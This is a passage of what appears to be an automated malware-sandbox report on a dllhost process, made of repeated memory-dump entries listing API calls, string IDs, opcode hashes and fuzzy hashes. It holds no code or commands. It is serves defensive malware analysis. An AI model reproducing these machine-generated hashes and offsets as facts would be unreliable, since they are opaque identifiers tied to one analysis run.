                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                  • Instruction ID: 9f172a097ba4bff7bc90c5481ea7216b2f7f41c7e61730e98e6c4028227e6e44
                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                  • Instruction Fuzzy Hash: 7A515936294642C7F72ADF16A840E9BB3A1F78DB88F504119DF4A637A4DF39C8468B40
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                  • Instruction ID: f1811b62cef40caee9a19e2727fd6307eb40520002ccd217abf5d696df12a82a
                                  • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                  • Instruction Fuzzy Hash: 82514736298641C7F72ADB26A840E9BB3A1F78CF88F544129DF5B63764DB38D8458B40
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: CurrentThread
                                  • String ID:
                                  • API String ID: 2882836952-0
                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                  • Instruction ID: e5bb023d385784ec0b3c27125e4a9e58ec1ac2bb671deb06b5d485ac83def99c
                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                  • Instruction Fuzzy Hash: 5261C336169A45C6F769DB15E490B9BB7A0F38CB88F100116FB8F97BA8DB78C540CB04
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: CurrentThread
                                  • String ID:
                                  • API String ID: 2882836952-0
                                  • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                  • Instruction ID: e5e388c6c1f82d27aaa6caf82da39b2db67c55b1d8da5d03a7b589de8dc7d0a7
                                  • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                  • Instruction Fuzzy Hash: 1361C8365A9A80C6F76ADB55E454B5BB7A0F388B48F100119FB8F53BB8DB78C580CB40
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                  • String ID:
                                  • API String ID: 1092925422-0
                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                  • Instruction ID: 380ece5ac0d56bd94a10ca91bbe93b6ce71b8feca79b928ae9b2bb2f3524fd11
                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                  • Instruction Fuzzy Hash: DA115E36A04B42C3FB2ADB21E404A8B67B1FB4DB88F044026DB4D537A4EB7DC944C781
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                  • String ID:
                                  • API String ID: 1092925422-0
                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                  • Instruction ID: e6d56b7c8ba6e817e2c118d995b3df33115c8d731a070cbe67c200a51afde802
                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                  • Instruction Fuzzy Hash: FA115136A48740C3FB2ADB21E40468A6770FB49F88F04042AEB4E53764EB7DD584C781
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 2395640692-1018135373
                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction ID: 83b7464449a898e0fd0f008934f7d663bfc7d7143250ddb684bce015a62d668d
                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction Fuzzy Hash: 61518B32351A02CAEB5ADB19E448FAE7791E758F9CF148121AF4B677A9DB78C841C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 2395640692-1018135373
                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction ID: 2c30a42c63118f440b464dd08f420ba0d5bd740ba152934d3b8f99ddc1be5b7b
                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                  • Instruction Fuzzy Hash: 4F51AD32299600CAFB5ADB59E484FAE7791E758F8CF148121EF4B577A8DB78D841C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 3896166516-3733052814
                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction ID: 828403560b8d5ffa5eb90c8f0ef81898060e23ef55f529551eb4456cfb296f63
                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction Fuzzy Hash: 84518FB2280682CBFB7ACB119544B9A77A0F358F9CF584117DB9A67BA5CB3CC450CB01
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: CallEncodePointerTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3544855599-2084237596
                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction ID: 193b9f315d51c90ee0bf5742c46c473fdf5abcbf5733ba988f6bd1c22f78f555
                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction Fuzzy Hash: FF619072508BC5C5EB26DF15E440BDAB7A0F789B9CF444216EB9923BA9DB7CD190CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000003.2319649635.000001C03F6E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C03F6E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_3_1c03f6e0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 3896166516-3733052814
                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction ID: 6905e8a1cc13955225baf9daa129cebda59b2db0ebc66af4ae803919cfec0979
                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction Fuzzy Hash: D4516A3B3842C1CEFB658F219644BDC77A8FB69B98F146199DAC947B95CB38C450CB01
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 3896166516-3733052814
                                  • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction ID: 887bd0989c8916d6ed0741fd63f061286751a1d6b61b727a4da8727681f0ecbb
                                  • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                  • Instruction Fuzzy Hash: F8515A322C8680CAFB6BCF21A544B9A77A1F358F9CF544116DB8A67BA5CB3CD850C705
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: CallEncodePointerTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3544855599-2084237596
                                  • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction ID: b3268baa8a35be18903fdba8d21d691fdbfe15bb780c02335895c060a13bd70e
                                  • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                  • Instruction Fuzzy Hash: A9615C72548BC4C5FB26DB15E441BDAB7A0F789B9CF444216EB9923BA5DB7CC190CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                  • String ID: pid_
                                  • API String ID: 517849248-4147670505
                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                  • Instruction ID: 38213a376150e604a8d941ae6d985805ae48bde4c996c5e16f2e29d80ce1bf1b
                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                  • Instruction Fuzzy Hash: 12117271350782D1FB1ADB25E9047DBA6A4B78CB88F9041259F8EE36E4EF68C905C700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                  • String ID: pid_
                                  • API String ID: 517849248-4147670505
                                  • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                  • Instruction ID: 0ef42eb90b27bbf8d821d14ae7985bf9f8c9f344bd5b9fb0b2e84112d588fff9
                                  • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                  • Instruction Fuzzy Hash: 411178313D8781D1FB29DB25E8007DB53A4BB4CB88F8044259B8BE36A4EF68C915C700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                  • String ID:
                                  • API String ID: 2718003287-0
                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                  • Instruction ID: 202ec8edbc16b81c7cd4ddd32aede96a8d3d0f911aa7545f000f763fa02a3334
                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                  • Instruction Fuzzy Hash: BAD18632754B94CAF716CBA9D940ADE37B1E358B9CF404216DF5EA7B99DA34C10AC340
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                  • String ID:
                                  • API String ID: 2718003287-0
                                  • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                  • Instruction ID: f8caeea903b3eff039f4698a5c78994342e74f4bda8145843af2e3cfe25a4e5e
                                  • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                  • Instruction Fuzzy Hash: C4D1A832754A80C9F716CBA9D440ADE37B1FB68B9CF504216DF6AA7BA9DA34D106C340
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Free
                                  • String ID:
                                  • API String ID: 3168794593-0
                                  • Opcode ID: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                  • Instruction ID: 5a1011d9486e765d7ba40cc25435cd7167fae03bd1d0927e1cf3db12c06e0eeb
                                  • Opcode Fuzzy Hash: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                  • Instruction Fuzzy Hash: 2A0132B2610A808AE705EF67B80438977A0F78CFC0F4A4525FB5953B39CE38D091C744
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Free
                                  • String ID:
                                  • API String ID: 3168794593-0
                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                  • Instruction ID: d905a34df13ecc53adc70084680e99b9d109fc894b0984ba2b801d86c1c22060
                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                  • Instruction Fuzzy Hash: 05016D32650B91DAE719EF66E90469AB7A0F78DF84B054025DF4D63764DF38D051C740
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$Free
                                  • String ID:
                                  • API String ID: 3168794593-0
                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                  • Instruction ID: 801005784ed22b8cc0facadef43b51b1fe6e8d5bb79048439a1e756072adcc7c
                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                  • Instruction Fuzzy Hash: 14012D32654B90DAE719EF66E80468A77B1FB8CF85B054025DF5B63724DF38E451C740
                                  APIs
                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001C0402028DF), ref: 000001C040202A12
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: ConsoleMode
                                  • String ID:
                                  • API String ID: 4145635619-0
                                  • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                  • Instruction ID: 2032a7538bf20b56707928b3f059611d22abaecf3473b389c3a60300ca756ae2
                                  • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                  • Instruction Fuzzy Hash: 3A91A932650765C9FB6ADF659A90BEE2BA0B35CB8CF544107DF4A77AC5DA34C48AC300
                                  APIs
                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001C0401D28DF), ref: 000001C0401D2A12
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
